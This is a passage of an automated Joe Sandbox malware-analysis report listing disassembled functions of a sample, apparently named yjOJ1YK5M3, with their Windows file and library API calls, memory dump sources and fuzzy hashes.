                                        • Source File: 00000000.00000002.1823258537.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                        • Associated: 00000000.00000002.1823242595.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823291718.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823309397.00000000002B9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823309397.00000000002C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823349371.00000000002C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_270000_yjOJ1YK5M3.jbxd
                                        Similarity
                                        • API ID: H_prolog3__wcslen$H_prolog3_catch_
                                        • String ID: |Z,
                                        • API String ID: 1265872803-3492188443
                                        • Opcode ID: 44415677dfdc273c0892155e8aaf3b33399ae086e3c68be6411a15012bcfe882
                                        • Instruction ID: ca295d595a76810911cf67baf7981783dbad910d3db9f1776522625e171ecde3
                                        • Opcode Fuzzy Hash: 44415677dfdc273c0892155e8aaf3b33399ae086e3c68be6411a15012bcfe882
                                        • Instruction Fuzzy Hash: 5511AC359319B09FC705EB64AC15FDD7BA49B16310F40429EE44897253CBB0AAD4CFA1
                                        Function 0027DE9A Relevance: 4.6, APIs: 3, Instructions: 115fileCOMMON
                                        Download Yara Rule
                                        APIs
                                        • __EH_prolog3_GS.LIBCMT ref: 0027DEA1
                                        • CreateFileW.KERNELBASE(?,?,?,00000000,00000002,00000000,00000000,?,00000024,0027E8F5,?,?,0027A6B9,?,00000011,?), ref: 0027DF15
                                        • CreateFileW.KERNEL32(?,?,?,00000000,00000002,00000000,00000000,?,?,?,0027D303,?,?,?), ref: 0027DF65
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1823258537.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                        • Associated: 00000000.00000002.1823242595.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823291718.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823309397.00000000002B9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823309397.00000000002C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823349371.00000000002C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_270000_yjOJ1YK5M3.jbxd
                                        Similarity
                                        • API ID: CreateFile$H_prolog3_
                                        • String ID:
                                        • API String ID: 1771569470-0
                                        • Opcode ID: 273f9ba8bfa952dc55b2e04a985e158110712569f7cb072164a59e8c9df1b84d
                                        • Instruction ID: c221011f1dc6ee6d06df4cc7d59ce86907ed7ed1fb31f9021c1675d69b321a16
                                        • Opcode Fuzzy Hash: 273f9ba8bfa952dc55b2e04a985e158110712569f7cb072164a59e8c9df1b84d
                                        • Instruction Fuzzy Hash: 394180709202099FDF14DFA4D889BEEB7F8AF09320F10961EE056A6281D774A9548B25
                                        Function 00286C5E Relevance: 4.6, APIs: 3, Instructions: 90libraryCOMMON
                                        Download Yara Rule
                                        APIs
                                        • __EH_prolog3_GS.LIBCMT ref: 00286C65
                                        • GetSystemDirectoryW.KERNEL32(00000000,00000104), ref: 00286C9A
                                        • LoadLibraryW.KERNELBASE(00000000,?,?,00000000,00000000,?), ref: 00286D0C
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1823258537.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                        • Associated: 00000000.00000002.1823242595.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823291718.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823309397.00000000002B9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823309397.00000000002C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823349371.00000000002C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_270000_yjOJ1YK5M3.jbxd
                                        Similarity
                                        • API ID: DirectoryH_prolog3_LibraryLoadSystem
                                        • String ID:
                                        • API String ID: 1552931673-0
                                        • Opcode ID: 24656a0859593abb8f9647a12cc70770fa676c64c16812b4f2e1dce13c32e077
                                        • Instruction ID: 35763d9011d210bde53cd87506977fe203ec44d1124984ba18c32a58ad3b6593
                                        • Opcode Fuzzy Hash: 24656a0859593abb8f9647a12cc70770fa676c64c16812b4f2e1dce13c32e077
                                        • Instruction Fuzzy Hash: 0031AE75E20208DBCF04EBE4C889BEEBBB8AF48314F10411EE505B7281DB345A65CF65
                                        Function 0027F58B Relevance: 4.6, APIs: 3, Instructions: 60COMMON
                                        Download Yara Rule
                                        APIs
                                        • __EH_prolog3_GS.LIBCMT ref: 0027F592
                                        • SetFileAttributesW.KERNELBASE(?,?,00000024,0027A724,?,?,?,00000011,?,?,00000000,?,?,?,?,?), ref: 0027F5A8
                                        • SetFileAttributesW.KERNEL32(?,?,?,?,?,0027D303,?,?,?,?,?,?,?,D946AC94,00000049), ref: 0027F5EB
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1823258537.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                        • Associated: 00000000.00000002.1823242595.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823291718.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823309397.00000000002B9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823309397.00000000002C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823349371.00000000002C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_270000_yjOJ1YK5M3.jbxd
                                        Similarity
                                        • API ID: AttributesFile$H_prolog3_
                                        • String ID:
                                        • API String ID: 2559025557-0
                                        • Opcode ID: e6db0eb333604af733b5227c5ca0dbc14860523401ac58ce5910ad6251ddf66b
                                        • Instruction ID: 1376c4d55a82c8112d02bf6800a80a5e15779d3913ab0e053d4601781f90015c
                                        • Opcode Fuzzy Hash: e6db0eb333604af733b5227c5ca0dbc14860523401ac58ce5910ad6251ddf66b
                                        • Instruction Fuzzy Hash: A8112970924219EBCF04DFA4E985ADEB7B8BF08310F14802AF514E7250DB349A65CF64
                                        Function 0027EC63 Relevance: 4.6, APIs: 3, Instructions: 58fileCOMMON
                                        Download Yara Rule
                                        APIs
                                        • __EH_prolog3_GS.LIBCMT ref: 0027EC6A
                                        • DeleteFileW.KERNELBASE(?,00000024,0027D6F7,?), ref: 0027EC7D
                                        • DeleteFileW.KERNEL32(00000000,?,00000000), ref: 0027ECBD
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1823258537.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                        • Associated: 00000000.00000002.1823242595.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823291718.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823309397.00000000002B9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823309397.00000000002C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823349371.00000000002C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_270000_yjOJ1YK5M3.jbxd
                                        Similarity
                                        • API ID: DeleteFile$H_prolog3_
                                        • String ID:
                                        • API String ID: 3558260747-0
                                        • Opcode ID: 3e50de2cf350b34e225b3a6322d2dcfca4d95e63a0e9a6ab71329abff131d591
                                        • Instruction ID: 310b3af7e391a6612541c12f1ffdec72cbee03f5379c0c068834a2478a762560
                                        • Opcode Fuzzy Hash: 3e50de2cf350b34e225b3a6322d2dcfca4d95e63a0e9a6ab71329abff131d591
                                        • Instruction Fuzzy Hash: EF110A75D20219DBDF05DFA4E989AEEB7B8AF0D310F14502AE504E7250DB349AA4CF74
                                        Function 0027ED1F Relevance: 4.6, APIs: 3, Instructions: 57COMMON
                                        Download Yara Rule
                                        APIs
                                        • __EH_prolog3_GS.LIBCMT ref: 0027ED26
                                        • GetFileAttributesW.KERNELBASE(?,00000024,0027ED16,00000000,0027A4A1,D946AC94,?,0027CDDD,?,?,?,?,?,?,?,?), ref: 0027ED39
                                        • GetFileAttributesW.KERNELBASE(?,?,?), ref: 0027ED79
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1823258537.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                        • Associated: 00000000.00000002.1823242595.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823291718.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823309397.00000000002B9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823309397.00000000002C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823349371.00000000002C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_270000_yjOJ1YK5M3.jbxd
                                        Similarity
                                        • API ID: AttributesFile$H_prolog3_
                                        • String ID:
                                        • API String ID: 2559025557-0
                                        • Opcode ID: 5511a2f76ca6eec24f21cbcd1706ced217d5f44c8930bdbb8eabf136c27c8151
                                        • Instruction ID: 509e194c7d5f0061b61fbe5460afa233a9de516f05be928cfc40570d909b168b
                                        • Opcode Fuzzy Hash: 5511a2f76ca6eec24f21cbcd1706ced217d5f44c8930bdbb8eabf136c27c8151
                                        • Instruction Fuzzy Hash: 55113774920218DBCF14EFE8E8899EDB7F9AF4D310F14442AE504F3280DB309A548B74
                                        Function 0029492B Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                        Download Yara Rule
                                        APIs
                                        • ___delayLoadHelper2@8.DELAYIMP ref: 00294918
                                          • Part of subcall function 00294FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00295041
                                          • Part of subcall function 00294FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00295052
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1823258537.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                        • Associated: 00000000.00000002.1823242595.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823291718.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823309397.00000000002B9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823309397.00000000002C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823349371.00000000002C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_270000_yjOJ1YK5M3.jbxd
                                        Similarity
                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                        • String ID: gI)
                                        • API String ID: 1269201914-3520096407
                                        • Opcode ID: bf81d63f212d3a5ec2066679540f4f4223f5b6a47c51673c79ad63ce11793d5e
                                        • Instruction ID: 185ac7f4323d844864ca748e49d91d686398a33c6a23fbabf045374bf613ce52
                                        • Opcode Fuzzy Hash: bf81d63f212d3a5ec2066679540f4f4223f5b6a47c51673c79ad63ce11793d5e
                                        • Instruction Fuzzy Hash: 5CB0128127C0016C360472157E02D37011CC0C5B51330471EF804C1581D4C14E730431
                                        Function 00294921 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                        Download Yara Rule
                                        APIs
                                        • ___delayLoadHelper2@8.DELAYIMP ref: 00294918
                                          • Part of subcall function 00294FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00295041
                                          • Part of subcall function 00294FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00295052
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1823258537.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                        • Associated: 00000000.00000002.1823242595.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823291718.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823309397.00000000002B9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823309397.00000000002C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823349371.00000000002C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_270000_yjOJ1YK5M3.jbxd
                                        Similarity
                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                        • String ID: gI)
                                        • API String ID: 1269201914-3520096407
                                        • Opcode ID: 0182094c468073eadc2e385ada9fd2103671ac77ce7692ff403289609ad5dd9e
                                        • Instruction ID: 75f891bfacc9fe7af1631f8e511fdb33c960cbc8281c8790e8859b86a26ad38f
                                        • Opcode Fuzzy Hash: 0182094c468073eadc2e385ada9fd2103671ac77ce7692ff403289609ad5dd9e
                                        • Instruction Fuzzy Hash: 3FB0128127C1016C374472157D02D37011CC0C5B51330471EF404C1581D4C04DB20431
                                        Function 0029493F Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                        Download Yara Rule
                                        APIs
                                        • ___delayLoadHelper2@8.DELAYIMP ref: 00294918
                                          • Part of subcall function 00294FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00295041
                                          • Part of subcall function 00294FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00295052
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1823258537.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                        • Associated: 00000000.00000002.1823242595.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823291718.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823309397.00000000002B9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823309397.00000000002C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823349371.00000000002C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_270000_yjOJ1YK5M3.jbxd
                                        Similarity
                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                        • String ID: gI)
                                        • API String ID: 1269201914-3520096407
                                        • Opcode ID: ee868c4bc5bc5062a11c583b43d0ab2ce0abbe6fbf6c22c9a831cfebe66c54e2
                                        • Instruction ID: 2c15b8595a550a56a5029b095ab5e2150f0be6ffc8b7ccc5294b2227d276bcbf
                                        • Opcode Fuzzy Hash: ee868c4bc5bc5062a11c583b43d0ab2ce0abbe6fbf6c22c9a831cfebe66c54e2
                                        • Instruction Fuzzy Hash: 89B0128527C1016C360472143D02D37010CC0C6B51330861EF804C1681D4C05D720431
                                        Function 00294935 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                        Download Yara Rule
                                        APIs
                                        • ___delayLoadHelper2@8.DELAYIMP ref: 00294918
                                          • Part of subcall function 00294FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00295041
                                          • Part of subcall function 00294FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00295052
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1823258537.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                        • Associated: 00000000.00000002.1823242595.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823291718.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823309397.00000000002B9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823309397.00000000002C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823349371.00000000002C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_270000_yjOJ1YK5M3.jbxd
                                        Similarity
                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                        • String ID: gI)
                                        • API String ID: 1269201914-3520096407
                                        • Opcode ID: 38659ccc35d4ae37cf7a04096f888b8ec1e498b080a9b69d5d781f717dd8e9be
                                        • Instruction ID: eeaf46bf4b45b0e8e8cc09e2f597aa0795624af62a31d5ebecf78741ab4646b7
                                        • Opcode Fuzzy Hash: 38659ccc35d4ae37cf7a04096f888b8ec1e498b080a9b69d5d781f717dd8e9be
                                        • Instruction Fuzzy Hash: 00B0128127C1016C360472147D02D37011CC0C5B51330471FF404C1581D4C04D720431
                                        Function 00294906 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                        Download Yara Rule
                                        APIs
                                        • ___delayLoadHelper2@8.DELAYIMP ref: 00294918
                                          • Part of subcall function 00294FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00295041
                                          • Part of subcall function 00294FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00295052
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1823258537.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                        • Associated: 00000000.00000002.1823242595.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823291718.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823309397.00000000002B9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823309397.00000000002C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823349371.00000000002C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_270000_yjOJ1YK5M3.jbxd
                                        Similarity
                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                        • String ID: gI)
                                        • API String ID: 1269201914-3520096407
                                        • Opcode ID: d33d438056a6df595c4c7a9febb59f4be3cd52192b5e299629eed1d911f78d1d
                                        • Instruction ID: f0b24bf8f67149a116ab5d65dea8d58ed7269d4ffdb2674693cb5388ccb0eff9
                                        • Opcode Fuzzy Hash: d33d438056a6df595c4c7a9febb59f4be3cd52192b5e299629eed1d911f78d1d
                                        • Instruction Fuzzy Hash: 5CB0129127C0017C360432113E02D37020CC4C1B51331461EF800C048298C25E730431
                                        Function 00294967 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                        Download Yara Rule
                                        APIs
                                        • ___delayLoadHelper2@8.DELAYIMP ref: 00294918
                                          • Part of subcall function 00294FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00295041
                                          • Part of subcall function 00294FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00295052
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1823258537.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                        • Associated: 00000000.00000002.1823242595.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823291718.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823309397.00000000002B9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823309397.00000000002C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823349371.00000000002C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_270000_yjOJ1YK5M3.jbxd
                                        Similarity
                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                        • String ID: gI)
                                        • API String ID: 1269201914-3520096407
                                        • Opcode ID: 8024a96be05a96642512d2cfc92e8a6cda65da4bf6bc76b2058ffe798cc3ebf9
                                        • Instruction ID: 493d66392755bf6aca9ac5560c03d028dbeed71632e47f7c8f665bd451fe7376
                                        • Opcode Fuzzy Hash: 8024a96be05a96642512d2cfc92e8a6cda65da4bf6bc76b2058ffe798cc3ebf9
                                        • Instruction Fuzzy Hash: 1BB0128127C0026C364876143D02D37010CC0C6B51330C61FF804C1681D4C04D760431
                                        Function 0029497B Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                        Download Yara Rule
                                        APIs
                                        • ___delayLoadHelper2@8.DELAYIMP ref: 00294918
                                          • Part of subcall function 00294FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00295041
                                          • Part of subcall function 00294FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00295052
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1823258537.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                        • Associated: 00000000.00000002.1823242595.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823291718.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823309397.00000000002B9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823309397.00000000002C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823349371.00000000002C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_270000_yjOJ1YK5M3.jbxd
                                        Similarity
                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                        • String ID: gI)
                                        • API String ID: 1269201914-3520096407
                                        • Opcode ID: 46c22965d2638a8bde0ca6457880262729d0771d08fd5715943fabbb4018ee3c
                                        • Instruction ID: 89edbef68786dc7b791bef3fe491623c1dbd9a53fe87c0737b040f3366405e00
                                        • Opcode Fuzzy Hash: 46c22965d2638a8bde0ca6457880262729d0771d08fd5715943fabbb4018ee3c
                                        • Instruction Fuzzy Hash: AEB0128127C0016C364872153E02D37010CC0C5B51330861EF804C1681D4C14E7B1431
                                        Function 00294949 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                        Download Yara Rule
                                        APIs
                                        • ___delayLoadHelper2@8.DELAYIMP ref: 00294918
                                          • Part of subcall function 00294FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00295041
                                          • Part of subcall function 00294FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00295052
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1823258537.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                        • Associated: 00000000.00000002.1823242595.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823291718.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823309397.00000000002B9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823309397.00000000002C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823349371.00000000002C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_270000_yjOJ1YK5M3.jbxd
                                        Similarity
                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                        • String ID: gI)
                                        • API String ID: 1269201914-3520096407
                                        • Opcode ID: 9c71618178eb7d5c821070ef030897303414b1acf1865e7447d82b00ab6a794d
                                        • Instruction ID: 2b5cb6e6feee502f3ef19854006731d744b452dbe91f581a9fd718a344b7078b
                                        • Opcode Fuzzy Hash: 9c71618178eb7d5c821070ef030897303414b1acf1865e7447d82b00ab6a794d
                                        • Instruction Fuzzy Hash: 8BB0128527C2016C3B4472153D02D37011CC0C5B51330471EF404C1681D4C04DB20431
                                        Function 0029495D Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                        Download Yara Rule
                                        APIs
                                        • ___delayLoadHelper2@8.DELAYIMP ref: 00294918
                                          • Part of subcall function 00294FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00295041
                                          • Part of subcall function 00294FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00295052
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1823258537.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                        • Associated: 00000000.00000002.1823242595.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823291718.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823309397.00000000002B9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823309397.00000000002C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823349371.00000000002C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_270000_yjOJ1YK5M3.jbxd
                                        Similarity
                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                        • String ID: gI)
                                        • API String ID: 1269201914-3520096407
                                        • Opcode ID: ed434a23c49028f06afe450a7738cd495b6bf175d32fed4062a5c744afb74af9
                                        • Instruction ID: 062a61dfbeaf5cd12cf644769df0920817dcaebf8031936f978598b1e4eed5c5
                                        • Opcode Fuzzy Hash: ed434a23c49028f06afe450a7738cd495b6bf175d32fed4062a5c744afb74af9
                                        • Instruction Fuzzy Hash: B9B012C527C1016C360472143D02D37010CC0C5B51330461EF404C1681D4C04D720531
                                        Function 00294953 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                        Download Yara Rule
                                        APIs
                                        • ___delayLoadHelper2@8.DELAYIMP ref: 00294918
                                          • Part of subcall function 00294FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00295041
                                          • Part of subcall function 00294FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00295052
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1823258537.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
                                        • Associated: 00000000.00000002.1823242595.0000000000270000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823291718.00000000002AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823309397.00000000002B9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823309397.00000000002C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1823349371.00000000002C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_270000_yjOJ1YK5M3.jbxd
                                        Similarity
                                        • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                        • String ID: gI)
                                        • API String ID: 1269201914-3520096407
                                        • Opcode ID: 1cfbc110237affb76c0e2b687b557ca6e769deb96749004143afd4e70d35b0ad
                                        • Instruction ID: dcb5ba21d119e0c7f2b0adf7def03c67c79ce14cdcb4ff8e39f422430bae696e
                                        • Opcode Fuzzy Hash: 1cfbc110237affb76c0e2b687b557ca6e769deb96749004143afd4e70d35b0ad
                                        • Instruction Fuzzy Hash: 0DB0128527C2016C360472153E02D37010CC0C5B51330461EF804C1681D4C14F730431
                                        Function 002949A3 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                        Download Yara Rule
                                        APIs
                                        • ___delayLoadHelper2@8.DELAYIMP ref: 00294918
                                          • Part of subcall function 00294FCE: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00295041
                                          • Part of subcall function 00294FCE: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00295052
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1823258537.0000000000271000.00000020.00000001.01000000.00000003.sdmp, Offset: 00270000, based on PE: true
